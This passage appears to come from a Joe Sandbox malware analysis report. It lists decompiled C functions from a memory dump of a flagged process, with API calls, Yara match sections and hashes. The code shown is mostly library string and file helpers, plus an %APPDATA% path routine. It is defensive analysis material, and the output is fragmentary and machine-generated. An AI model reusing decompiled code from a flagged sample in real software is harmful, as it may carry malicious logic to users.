                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E0041DA9B(_t45, _t62, _v8 ^ _t71, _t68, _t69, _t70);
                                                                    			}



















                                                                    APIs
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,0041C7FC,?,?,?,00000000,00000104,00000000), ref: 0041C26E
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0041C7FC,?,?,?,00000000,00000104), ref: 0041C29E
                                                                    • GetLocalTime.KERNEL32(?,?,?,?,0041C7FC,?,?,?,00000000,00000104,00000000), ref: 0041C2CA
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0041C7FC,?,?,?,00000000,00000104,00000000), ref: 0041C2D8
                                                                      • Part of subcall function 0041BDB5: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BDE3
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                    • String ID:
                                                                    • API String ID: 3986731826-0
                                                                    • Opcode ID: 31c3b757d30fce1f0dd3530f2d07acd6675b560af08c580c3f67bc801e869bdf
                                                                    • Instruction ID: c47d1c74b6fe0dbb013d994ab2cf3d48cd5b4d7b07a9299f2b236cd2f0fe87bf
                                                                    • Opcode Fuzzy Hash: 31c3b757d30fce1f0dd3530f2d07acd6675b560af08c580c3f67bc801e869bdf
                                                                    • Instruction Fuzzy Hash: D8414C719002499FCF15DFA9C880ADEBBF8FF49310F1441AAE854EB256D3349985CB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00431057(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                    				intOrPtr _t25;
                                                                    				void* _t26;
                                                                    
                                                                    				_t25 = _a16;
                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                    					_t26 = E00430949(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                    					goto L9;
                                                                    				} else {
                                                                    					_t35 = _t25 - 0x66;
                                                                    					if(_t25 != 0x66) {
                                                                    						__eflags = _t25 - 0x61;
                                                                    						if(_t25 == 0x61) {
                                                                    							L7:
                                                                    							_t26 = E00430A30(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                    						} else {
                                                                    							__eflags = _t25 - 0x41;
                                                                    							if(__eflags == 0) {
                                                                    								goto L7;
                                                                    							} else {
                                                                    								_t26 = E00430F6A(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                    							}
                                                                    						}
                                                                    						L9:
                                                                    						return _t26;
                                                                    					} else {
                                                                    						return E00430EA9(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                    					}
                                                                    				}
                                                                    			}






                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                    • Instruction ID: 8501afd68e82aa54c8f7bb2d103e32ce36438d8cb66e749964dcea4e0054fcca
                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                    • Instruction Fuzzy Hash: 73117E3200018AFBCF265E85CC51CEE3F72BF1C354F18A51AFA1859531C23AC9B2AB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E00415E43(char* __eax, char* _a4) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr* _v12;
                                                                    				intOrPtr* _t10;
                                                                    				char* _t14;
                                                                    				CHAR* _t15;
                                                                    				intOrPtr _t16;
                                                                    				void* _t17;
                                                                    				void* _t19;
                                                                    				void* _t20;
                                                                    				char* _t22;
                                                                    
                                                                    				_t22 = __eax;
                                                                    				_t14 = StrStrA(__eax, _a4);
                                                                    				if(_t14 != 0) {
                                                                    					_t19 = _t14 - _t22;
                                                                    					_t22 = 0x446738;
                                                                    					 *0x4463a0(0x446738, _t22, _t19, _t17);
                                                                    					_t10 = _v12;
                                                                    					_t3 = _t19 + 0x446738; // 0x446738
                                                                    					_t15 = _t3;
                                                                    					 *_t15 = 0;
                                                                    					_t20 = _t10 + 1;
                                                                    					do {
                                                                    						_t16 =  *_t10;
                                                                    						_t10 = _t10 + 1;
                                                                    					} while (_t16 != 0);
                                                                    					wsprintfA(_t15, "%s%s", _v8, _t10 - _t20 + _t14);
                                                                    				}
                                                                    				return _t22;
                                                                    			}














                                                                    APIs
                                                                    • StrStrA.SHLWAPI(?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E4C
                                                                    • lstrcpyn.KERNEL32(00446738,?,00000000,?,?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E65
                                                                    • wsprintfA.USER32 ref: 00415E91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpynwsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1799455324-3252725368
                                                                    • Opcode ID: 393492f4549c9b792aa1224fcd533445a5958cbde6c9ff708e5fe85e06368ede
                                                                    • Instruction ID: d93e4b79ebd00485133b04a5dbc1bdd8682614b46f9de107ed7e5781d0f10841
                                                                    • Opcode Fuzzy Hash: 393492f4549c9b792aa1224fcd533445a5958cbde6c9ff708e5fe85e06368ede
                                                                    • Instruction Fuzzy Hash: 22F0F6352013126FDB115B288C88DD7BFADEF97255B050065F84083211CB768809C29A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 30%
                                                                    			E00416388(void* __ecx, CHAR* _a4) {
                                                                    				void* _v8;
                                                                    				char _v12;
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				void* _t15;
                                                                    
                                                                    				_t15 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                    				if(_t15 != 0xffffffff) {
                                                                    					_t7 =  *0x446274(_t15,  &_v12);
                                                                    					_push(_t15);
                                                                    					if(_t7 != 0) {
                                                                    						CloseHandle();
                                                                    						_t9 = _v12;
                                                                    					} else {
                                                                    						CloseHandle();
                                                                    						goto L1;
                                                                    					}
                                                                    				} else {
                                                                    					L1:
                                                                    					_t9 = 0;
                                                                    				}
                                                                    				return _t9;
                                                                    			}









                                                                    APIs
                                                                    • CreateFileA.KERNEL32(00409915,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,00409915,?), ref: 004163A3
                                                                    • GetFileSizeEx.KERNEL32(00000000,00409915,?,?,?,00409915,?), ref: 004163BB
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409915,?), ref: 004163C6
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409915,?), ref: 004163CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileHandle$CreateSize
                                                                    • String ID:
                                                                    • API String ID: 4148174661-0
                                                                    • Opcode ID: 58dfb90a7643de4ec8f2a8ba50af8c166801039d5656cc922925295c48f3c977
                                                                    • Instruction ID: 4d933e429bde8ac1ac14d593430ac78cd44df0d66b26a74b996ace1fb338f76d
                                                                    • Opcode Fuzzy Hash: 58dfb90a7643de4ec8f2a8ba50af8c166801039d5656cc922925295c48f3c977
                                                                    • Instruction Fuzzy Hash: E1F08239601218FBE710AB60DC09FDF7A6CFB06750F124261FE11A21D0D7B0AA41966E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040440A(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t13;
                                                                    				intOrPtr* _t17;
                                                                    				intOrPtr* _t20;
                                                                    				intOrPtr* _t23;
                                                                    				intOrPtr _t25;
                                                                    				intOrPtr* _t27;
                                                                    				intOrPtr _t31;
                                                                    				intOrPtr* _t34;
                                                                    				void* _t35;
                                                                    
                                                                    				_t23 = _a4;
                                                                    				_t13 =  *((intOrPtr*)(_t23 + 0x10));
                                                                    				_t34 = __ecx;
                                                                    				_t25 = _a8;
                                                                    				if(_t13 < _t25) {
                                                                    					_t13 = E0041CFED("invalid string position");
                                                                    				}
                                                                    				_t31 = _t13 - _t25;
                                                                    				if(_a12 < _t31) {
                                                                    					_t31 = _a12;
                                                                    				}
                                                                    				if(_t34 != _t23) {
                                                                    					if(E004044A3(_t23, _t34, _t31, _t35, _t31, 0) != 0) {
                                                                    						if( *((intOrPtr*)(_t23 + 0x14)) < 0x10) {
                                                                    							_t17 = _t23;
                                                                    						} else {
                                                                    							_t17 =  *_t23;
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
                                                                    							_t27 = _t34;
                                                                    						} else {
                                                                    							_t27 =  *_t34;
                                                                    						}
                                                                    						E00420090(_t27, _t17 + _a8, _t31);
                                                                    						 *((intOrPtr*)(_t34 + 0x10)) = _t31;
                                                                    						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
                                                                    							_t20 = _t34;
                                                                    						} else {
                                                                    							_t20 =  *_t34;
                                                                    						}
                                                                    						 *((char*)(_t20 + _t31)) = 0;
                                                                    					}
                                                                    				} else {
                                                                    					E0040453E(_t34, _t31 + _t25, 0xffffffff);
                                                                    					E0040453E(_t34, 0, _a8);
                                                                    				}
                                                                    				return _t34;
                                                                    			}
















                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00404424
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                      • Part of subcall function 004044A3: std::_Xinvalid_argument.LIBCPMT ref: 004044B2
                                                                    • _memmove.LIBCMT ref: 0040447F
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040441F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position
                                                                    • API String ID: 3404309857-1799206989
                                                                    • Opcode ID: c84d20c9b8642d089f61c3007de59df56a6136ab1d1563934e22eb90509181ac
                                                                    • Instruction ID: 71b88961af2b5fc5f2eec8d3aeff62b16637d08c462ab68e2fe6546011dd54b6
                                                                    • Opcode Fuzzy Hash: c84d20c9b8642d089f61c3007de59df56a6136ab1d1563934e22eb90509181ac
                                                                    • Instruction Fuzzy Hash: 131108B1304210ABCB14DE599C41F2AB3A5EBC5715F10053FFA52A72C2D778DD01879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040D3B5(intOrPtr* __eax, intOrPtr* __edi, signed int _a4, intOrPtr _a8) {
                                                                    				void* __ebx;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t17;
                                                                    				intOrPtr* _t21;
                                                                    				intOrPtr* _t24;
                                                                    				intOrPtr* _t29;
                                                                    				void* _t30;
                                                                    				intOrPtr* _t31;
                                                                    				intOrPtr* _t36;
                                                                    				intOrPtr _t38;
                                                                    				intOrPtr _t39;
                                                                    
                                                                    				_t36 = __edi;
                                                                    				_t29 = __eax;
                                                                    				_t17 = _a4;
                                                                    				_t38 =  *((intOrPtr*)(__eax + 0x10));
                                                                    				if(_t38 < _t17) {
                                                                    					_t17 = E0041CFED("invalid string position");
                                                                    				}
                                                                    				_t39 = _t38 - _t17;
                                                                    				if(_a8 < _t39) {
                                                                    					_t39 = _a8;
                                                                    				}
                                                                    				if(_t36 != _t29) {
                                                                    					if(E0040D4DE(_t29, _t36, _t39) != 0) {
                                                                    						if( *((intOrPtr*)(_t29 + 0x14)) < 8) {
                                                                    							_t21 = _t29;
                                                                    						} else {
                                                                    							_t21 =  *_t29;
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
                                                                    							_t31 = _t36;
                                                                    						} else {
                                                                    							_t31 =  *_t36;
                                                                    						}
                                                                    						_t30 = _t39 + _t39;
                                                                    						E00420090(_t31, _t21 + _a4 * 2, _t30);
                                                                    						 *((intOrPtr*)(_t36 + 0x10)) = _t39;
                                                                    						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
                                                                    							_t24 = _t36;
                                                                    						} else {
                                                                    							_t24 =  *_t36;
                                                                    						}
                                                                    						 *((short*)(_t30 + _t24)) = 0;
                                                                    					}
                                                                    				} else {
                                                                    					E0040D46D(_t17 | 0xffffffff, _t39 + _t17, _t36);
                                                                    					E0040D46D(_a4, 0, _t36);
                                                                    				}
                                                                    				return _t36;
                                                                    			}
















                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040D3CB
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                      • Part of subcall function 0040D4DE: std::_Xinvalid_argument.LIBCPMT ref: 0040D4EB
                                                                    • _memmove.LIBCMT ref: 0040D426
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040D3C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position
                                                                    • API String ID: 3404309857-1799206989
                                                                    • Opcode ID: 51085be7a4a6b2cb6b4a84b2c01f0f5e9400d741291547f272db0d047e90bd40
                                                                    • Instruction ID: 39d03dba5bfe18f3b815d5de13de3abcdcc50f6a9039957bbc31f542dee680fa
                                                                    • Opcode Fuzzy Hash: 51085be7a4a6b2cb6b4a84b2c01f0f5e9400d741291547f272db0d047e90bd40
                                                                    • Instruction Fuzzy Hash: A0115131B04214DBCB14EEADD8C086973A5AF95324750453BF816EB2C1D738FD5ACB9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040C2E9(signed int __eax, void* __ebx, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t13;
                                                                    				intOrPtr* _t16;
                                                                    				intOrPtr* _t18;
                                                                    				intOrPtr* _t19;
                                                                    				void* _t22;
                                                                    				signed int _t23;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr* _t32;
                                                                    				void* _t33;
                                                                    
                                                                    				_t33 = __ebp;
                                                                    				_t22 = __ebx;
                                                                    				_t29 = _a4;
                                                                    				_t32 = __eax;
                                                                    				_t23 = __eax;
                                                                    				if(E00404505(__eax, _a4) == 0) {
                                                                    					_t3 = _t32 + 0x10; // 0x14083
                                                                    					_t13 =  *_t3;
                                                                    					if((_t23 | 0xffffffff) - _t13 <= __ebx) {
                                                                    						_t13 = E0041CFA0("string too long");
                                                                    					}
                                                                    					if(_t22 != 0) {
                                                                    						_t30 = _t13 + _t22;
                                                                    						if(E004044A3(_t22, _t32, _t30, _t33, _t30, 0) != 0) {
                                                                    							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                    								_t16 = _t32;
                                                                    							} else {
                                                                    								_t16 =  *_t32;
                                                                    							}
                                                                    							_t6 = _t32 + 0x10; // 0x14083
                                                                    							E00420090( *_t6 + _t16, _a4, _t22);
                                                                    							 *((intOrPtr*)(_t32 + 0x10)) = _t30;
                                                                    							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                    								_t18 = _t32;
                                                                    							} else {
                                                                    								_t18 =  *_t32;
                                                                    							}
                                                                    							 *((char*)(_t18 + _t30)) = 0;
                                                                    						}
                                                                    					}
                                                                    					return _t32;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                    					_t19 = _t32;
                                                                    				} else {
                                                                    					_t19 =  *_t32;
                                                                    				}
                                                                    				return E00404799(_t22, _t23, _t32, _t32, _t29 - _t19);
                                                                    			}















                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argument_memmovestd::_
                                                                    • String ID: string too long
                                                                    • API String ID: 256744135-2556327735
                                                                    • Opcode ID: 4048561c59f235bc094e0d827abe63b21efa2ec50549c6101e3ab7b4f98de422
                                                                    • Instruction ID: e162f7baa55cd456ad8d6d03248c366c9d87632f5a447c05ac5f3b4133326794
                                                                    • Opcode Fuzzy Hash: 4048561c59f235bc094e0d827abe63b21efa2ec50549c6101e3ab7b4f98de422
                                                                    • Instruction Fuzzy Hash: FA11A771310710DBD6349F2D9881A2AB3E5DF82B04B104B3FF992A72C1D778DC05869D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _malloc
                                                                    • String ID: image/jpeg
                                                                    • API String ID: 1579825452-3785015651
                                                                    • Opcode ID: 7903822f628e9fcc13ea499a69416d40267faf483abcf632134ad1f49bcadf9c
                                                                    • Instruction ID: 9deb9c53637fe15961d72f2e046ec25fc64e134807efa7d22ec6b11529159120
                                                                    • Opcode Fuzzy Hash: 7903822f628e9fcc13ea499a69416d40267faf483abcf632134ad1f49bcadf9c
                                                                    • Instruction Fuzzy Hash: 3611A1B2E00114FF8B11DFA5CD818CFBB79FE02360B22027BE911A21A0D776DE90D659
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040453E(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr _t15;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t20;
                                                                    				intOrPtr* _t21;
                                                                    				intOrPtr _t22;
                                                                    				intOrPtr* _t23;
                                                                    				intOrPtr* _t26;
                                                                    				intOrPtr* _t30;
                                                                    
                                                                    				_t30 = __ecx;
                                                                    				_t9 =  *((intOrPtr*)(__ecx + 0x10));
                                                                    				_t20 = _a4;
                                                                    				if(_t9 < _t20) {
                                                                    					_t9 = E0041CFED("invalid string position");
                                                                    				}
                                                                    				_t17 = _a8;
                                                                    				_t10 = _t9 - _t20;
                                                                    				if(_t10 < _t17) {
                                                                    					_t17 = _t10;
                                                                    				}
                                                                    				if(_t17 != 0) {
                                                                    					_t22 =  *((intOrPtr*)(_t30 + 0x14));
                                                                    					if(_t22 < 0x10) {
                                                                    						_t26 = _t30;
                                                                    					} else {
                                                                    						_t26 =  *_t30;
                                                                    					}
                                                                    					if(_t22 < 0x10) {
                                                                    						_t23 = _t30;
                                                                    					} else {
                                                                    						_t23 =  *_t30;
                                                                    					}
                                                                    					E0041DCF0(_t23 + _t20, _t26 + _t20 + _t17, _t10 - _t17);
                                                                    					_t15 =  *((intOrPtr*)(_t30 + 0x10)) - _t17;
                                                                    					 *((intOrPtr*)(_t30 + 0x10)) = _t15;
                                                                    					if( *((intOrPtr*)(_t30 + 0x14)) < 0x10) {
                                                                    						_t21 = _t30;
                                                                    					} else {
                                                                    						_t21 =  *_t30;
                                                                    					}
                                                                    					 *((char*)(_t21 + _t15)) = 0;
                                                                    				}
                                                                    				return _t30;
                                                                    			}














                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00404551
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • _memmove.LIBCMT ref: 0040458C
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040454C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                    • String ID: invalid string position
                                                                    • API String ID: 1785806476-1799206989
                                                                    • Opcode ID: 37caa54bd28c21300105505d187711df10a1c724f58efbc90191239339e49f73
                                                                    • Instruction ID: 22196df5fd703f2689d0317eea6ea5b30810e9d64783d7f03cd132f7c48a3960
                                                                    • Opcode Fuzzy Hash: 37caa54bd28c21300105505d187711df10a1c724f58efbc90191239339e49f73
                                                                    • Instruction Fuzzy Hash: 9D01B5B17042519BC724DD2C9DC081BB3A6ABC57107204D3ED781D76C5DB78EC46879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040D46D(void* __eax, signed int __ecx, intOrPtr* __esi) {
                                                                    				intOrPtr _t14;
                                                                    				void* _t15;
                                                                    				signed int _t24;
                                                                    				intOrPtr* _t26;
                                                                    				signed int _t28;
                                                                    				intOrPtr* _t29;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr* _t31;
                                                                    				void* _t33;
                                                                    				intOrPtr* _t34;
                                                                    
                                                                    				_t34 = __esi;
                                                                    				_t28 = __ecx;
                                                                    				_t33 = __eax;
                                                                    				_t14 =  *((intOrPtr*)(__esi + 0x10));
                                                                    				if(_t14 < __ecx) {
                                                                    					_t14 = E0041CFED("invalid string position");
                                                                    				}
                                                                    				_t15 = _t14 - _t28;
                                                                    				if(_t15 < _t33) {
                                                                    					_t33 = _t15;
                                                                    				}
                                                                    				if(_t33 != 0) {
                                                                    					_t30 =  *((intOrPtr*)(_t34 + 0x14));
                                                                    					if(_t30 < 8) {
                                                                    						_t26 = _t34;
                                                                    					} else {
                                                                    						_t26 =  *_t34;
                                                                    					}
                                                                    					if(_t30 < 8) {
                                                                    						_t31 = _t34;
                                                                    					} else {
                                                                    						_t31 =  *_t34;
                                                                    					}
                                                                    					E0041DCF0(_t31 + _t28 * 2, _t26 + (_t28 + _t33) * 2, _t15 - _t33 + _t15 - _t33);
                                                                    					_t24 =  *(_t34 + 0x10) - _t33;
                                                                    					 *(_t34 + 0x10) = _t24;
                                                                    					if( *((intOrPtr*)(_t34 + 0x14)) < 8) {
                                                                    						_t29 = _t34;
                                                                    					} else {
                                                                    						_t29 =  *_t34;
                                                                    					}
                                                                    					 *((short*)(_t29 + _t24 * 2)) = 0;
                                                                    				}
                                                                    				return _t34;
                                                                    			}














                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040D47C
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • _memmove.LIBCMT ref: 0040D4B7
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040D477
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                    • String ID: invalid string position
                                                                    • API String ID: 1785806476-1799206989
                                                                    • Opcode ID: bd22108d18d33d12116784987b6e33b195e77cd1b729ba8a546bc855f1c3ad5f
                                                                    • Instruction ID: f835edf4ddad0b073003091dfb0d406edfea27db699740cec3ed7e7fd980f876
                                                                    • Opcode Fuzzy Hash: bd22108d18d33d12116784987b6e33b195e77cd1b729ba8a546bc855f1c3ad5f
                                                                    • Instruction Fuzzy Hash: 06018831B0061587C720CEACD9C081AB3FAAFC4704320493FD042D7689D738F94A8798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E0042260A(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr* _t28;
                                                                    				void* _t29;
                                                                    
                                                                    				_t28 = __esi;
                                                                    				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                    				E00420723(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                    				 *((intOrPtr*)(E00425F05(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                    				_t17 = E00425F05(__ebx, __edx, __eflags);
                                                                    				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                    				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                    					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                    					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                    						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                    							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                    							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                    								_t17 = E004206FC(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                    								_t38 = _t17;
                                                                    								if(_t17 != 0) {
                                                                    									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                    									_push(_t28);
                                                                    									return E00422391(_t38);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t17;
                                                                    			}







                                                                    APIs
                                                                      • Part of subcall function 00420723: __getptd.LIBCMT ref: 00420729
                                                                      • Part of subcall function 00420723: __getptd.LIBCMT ref: 00420739
                                                                    • __getptd.LIBCMT ref: 00422619
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __getptd.LIBCMT ref: 00422627
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                    • String ID: csm
                                                                    • API String ID: 803148776-1018135373
                                                                    • Opcode ID: 80c862e238cdda68283083831f96ccd92a1a34500a3e73630a0c5572abc7b0aa
                                                                    • Instruction ID: 6cd6d4e37892e37580fe1db1fe00afb759a92dc5fcc937b26e6efe26780afa7e
                                                                    • Opcode Fuzzy Hash: 80c862e238cdda68283083831f96ccd92a1a34500a3e73630a0c5572abc7b0aa
                                                                    • Instruction Fuzzy Hash: D5018B32A00221AECF349F21F640AAEB3B5EF20310F94046FE44056269CFB88D91CF49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 48%
